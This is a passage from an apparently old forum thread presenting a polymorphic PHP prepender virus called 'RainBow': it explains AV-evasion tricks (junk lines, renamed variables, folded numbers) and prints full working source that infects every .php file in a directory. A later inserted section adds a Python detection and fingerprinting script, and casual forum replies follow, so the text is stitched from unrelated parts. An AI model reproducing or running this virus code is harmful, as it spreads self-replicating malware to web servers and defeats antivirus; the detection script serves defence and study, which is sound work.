--> Adding Trash/Junk/Garbage
The virus adds a junk line to the code about once every two lines.
This junk line could contain:
- // anything
- $anything='anything';
- $anything=number;
Because the code would be damn big after the 5th generation, I decided
to delete the trash after every generation and make new trash. Anyway,
the chance of getting a trash line will be bigger, because there are more
lines (more lines --> more chance). But I tested about 30 generations
and the size is no big problem.
--> Changing Variable/function names
The virus uses an array with all variable/function names of the virus;
every generation it changes every array entry (every name) to a new name
5-15 characters long.
--> Number changing
The virus is able to change every number in the code. This is a really
successful way to fool AVs, I think! A number (for instance '10') could
also be one of the following things:
10=(8+2)
10=(19-9)
10=(130/13)
It's easy to understand, I think. I decided to change every 5th number I can
find, because it looks better than changing every number every generation.
* Infection Method
--> Prepender
This code is a prepender virus, which doesn't harm the victim file.
It reads the first PHP part (which is the whole virus code) of the current
file (__FILE__, as it's called in PHP). Then it searches for every PHP file
in the current directory, and adds the changed virus code at the beginning of
the victim file. Before infecting, the virus checks if there's already an
infection mark of the virus, which is 'RainBow'.
Something else a little interesting is that it's hard to get many different generations of
the virus, because it only changes if it infects a file. And only the infected file has the
different form, not the old virus. That's a little trick which I read in an article about
polymorphism by SnakeByte. He wrote that it will take more time to get many generations, which
is a problem for AVs (who need many generations).
In the end I want to thank the following people, who made it possible that I
wrote this virus :)
<?php // RainBowsrand((double)microtime()*1000000); $changevars=array('changevars','string','newcont','curdir','filea','victim','viccont','newvars','returnvar','counti','countj','trash','allcont','number','remn'); $string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10)); $newcont='<?php // RainBow'.chr(13).chr(10);while ($string && $string!='?>
'){
if(rand(0,1)){
if(rand(0,1)){$newcont.='// '.trash('',0).chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.chr(39).trash('',0).chr(39).';'.chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.rand().';'.chr(13).chr(10);}}
$string=strtok(chr(13).chr(10));
if($string{0}!='/' && $string{0}!='$'){$newcont.=$string.chr(13).chr(10);}}
$counti=0;
while($changevars[$counti]){
$newcont=str_replace($changevars[$counti++],trash('',0),$newcont);}
$countj=-1; $number='';
while(++$countj<strlen($newcont)){
if (ord($newcont{$countj})>47&&ord($newcont{$countj})<58){
$number=$newcont{$countj};
while(ord($newcont{++$countj})>47&&ord($newcont{$countj})<58){$number.=$newcont{$countj};}
$remn=rand(1,10);
if (!rand(0,5)){switch(rand(1,3)){case 1:$allcont.='('.($number-$remn).'+'.$remn.')';break;
case 2:$allcont.='('.($number+$remn).'-'.$remn.')';break;
case 3:$allcont.='('.($number*$remn).'/'.$remn.')';break;}}else{$allcont.=$number;}}
$allcont.=$newcont{$countj};$number='';}
$curdir=opendir('.');
while($filea=readdir($curdir)){
if(strstr($filea,'.php')){$victim=fopen($filea,'r+');
if (!strstr(fread($victim, 25),'RainBow')){rewind($victim);
$viccont=fread($victim,filesize($filea));
rewind($victim);
fwrite($victim,$allcont.$viccont);}
fclose($victim);}}
closedir($curdir);
function trash($returnvar, $countj){
do{$returnvar.=chr(rand(97,122));}while($countj++<rand(5,15));
return $returnvar;}
?>
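Added example, not code from the post above: a defender-side triage script for the prepender described in it. It mirrors the infection check the write-up names (the 'RainBow' mark inside the first 25 bytes of a .php file), splits the prepended block from the victim's original content, and reduces a block to a form that is invariant under the three mutations the write-up lists (junk lines, renamed variables, folded numbers), so that two generations hash to one signature. The assumption that the prepended code ends at the first `?>` is mine (the post only says "the first PHP part"); the sample generations GEN_A and GEN_B are constructed and are not the virus.

```python
import hashlib
import re
from pathlib import Path

MARKER = b"RainBow"   # the infection mark named in the write-up
MARK_WINDOW = 25      # the prepender reads only this many bytes before deciding to infect


def is_marked(data: bytes) -> bool:
    """Mirror the virus's own pre-infection check: mark inside the first 25 bytes."""
    return MARKER in data[:MARK_WINDOW]


def split_prepended(data: bytes):
    """Return (prepended_block, original_content) for a marked file.

    Assumption (the write-up only says 'the first PHP part'): the prepended
    code is the first <?php ... ?> section and the victim's content follows it.
    """
    if not is_marked(data):
        return b"", data
    end = data.find(b"?>")
    if end < 0:
        return data, b""            # truncated block, nothing to hand back
    end += 2
    for nl in (b"\r\n", b"\n"):     # the virus emits CRLF; tolerate LF as well
        if data.startswith(nl, end):
            end += len(nl)
            break
    return data[:end], data[end:]


# The three mutations listed in the write-up, as regexes over one generation.
JUNK_LINE = re.compile(r"^(?://.*|\$[a-z]+='[a-z]*';|\$[a-z]+=\d+;)\r?\n", re.M)
FOLDED = re.compile(r"\((\d+)([+\-/])(\d+)\)")   # (8+2), (19-9), (130/13)
VAR = re.compile(r"\$([A-Za-z_]\w*)")


def _fold(m):
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    if op == "+":
        return str(a + b)
    if op == "-":
        return str(a - b)
    if b and a % b == 0:            # the virus only emits exact divisions
        return str(a // b)
    return m.group(0)               # inexact: leave real code alone


def normalize(src: str) -> str:
    """Undo the mutations so different generations compare equal.

    Numbers are folded first because the virus folds numbers after it has
    inserted its junk lines, so a junk '$x=77;' may arrive as '$x=(70+7);'.
    Variables are then alpha-renamed to $v0, $v1, ... by first appearance.
    """
    src = FOLDED.sub(_fold, src)
    src = JUNK_LINE.sub("", src)
    names = {}
    src = VAR.sub(lambda m: "$v%d" % names.setdefault(m.group(1), len(names)), src)
    return src.replace("\r\n", "\n")


def fingerprint(block: bytes) -> str:
    """Generation-invariant hash of a prepended block, usable as a signature."""
    return hashlib.sha256(normalize(block.decode("latin-1")).encode()).hexdigest()


def scan_directory(root: str):
    """Yield (path, fingerprint) for every marked .php file under root."""
    for path in Path(root).rglob("*.php"):
        data = path.read_bytes()
        if is_marked(data):
            block, _original = split_prepended(data)
            yield path, fingerprint(block)


# Constructed sample: two 'generations' of a tiny marked block that differ only
# by the mutations the write-up lists. This is NOT the virus code from the post.
GEN_A = (b"<?php // RainBow\r\n"
         b"// kqzmv\r\n"
         b"$total=(8+2)+$seed;\r\n"
         b"echo $total;\r\n"
         b"?>\r\n"
         b"<?php echo 'victim'; ?>\r\n")
GEN_B = (b"<?php // RainBow\r\n"
         b"$hgtrqp='mnbvcxz';\r\n"
         b"$zz=(70+7);\r\n"
         b"$wqr=(130/13)+$kkk;\r\n"
         b"echo $wqr;\r\n"
         b"?>\r\n"
         b"<?php echo 'victim'; ?>\r\n")

if __name__ == "__main__":
    for sample in (GEN_A, GEN_B):
        block, original = split_prepended(sample)
        print(fingerprint(block), original)
```

One caveat a practitioner should keep in mind: the junk shapes `$x='abc';` and `$x=123;` are indistinguishable from real one-line assignments, so the normalizer drops those too. The virus has the same limitation in its own copy loop (it skips any line that starts with `/` or `$`), which is why matching should be done on the fingerprint of the whole block rather than on any single line. When writing the recovered `original` back over an infected file, do it only after the block's fingerprint has matched a known sample.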
Well, if it's in PHP there's no need to be afraid at all... :D :D
How many of you have EasyPHP (to name one) on your PC??? :D :D
Cheers ;)
xD xD xD well, be careful... :D :D :D ;) ;) ;)
PS: I don't have it for 2 reasons: 1, because it takes up a significant amount of MB on the PC, and with the programs plus their compilers + eMule I run dry... And the other because I don't program much in PHP.. :D :D
If I programmed in PHP I'd download a program other than EasyPHP... ;) ;) since it's very heavy because of everything it includes.
Cheers
Quote from: Hendrix on December 10, 2006, 07:03:35 PM
xD xD xD well, be careful... :D :D :D ;) ;) ;)
PS: I don't have it for 2 reasons: 1, because it takes up a significant amount of MB on the PC, and with the programs plus their compilers + eMule I run dry... And the other because I don't program much in PHP.. :D :D
If I programmed in PHP I'd download a program other than EasyPHP... ;) ;) since it's very heavy because of everything it includes.
Cheers
Okay... I'll keep it in mind, and while we're at it, recommend one :D ;)
I'll leave you the program a friend of mine made; follow its updates, since for now it's a beta, I think.
http://foro.elhacker.net/index.php/topic,150198.0.html
Cheers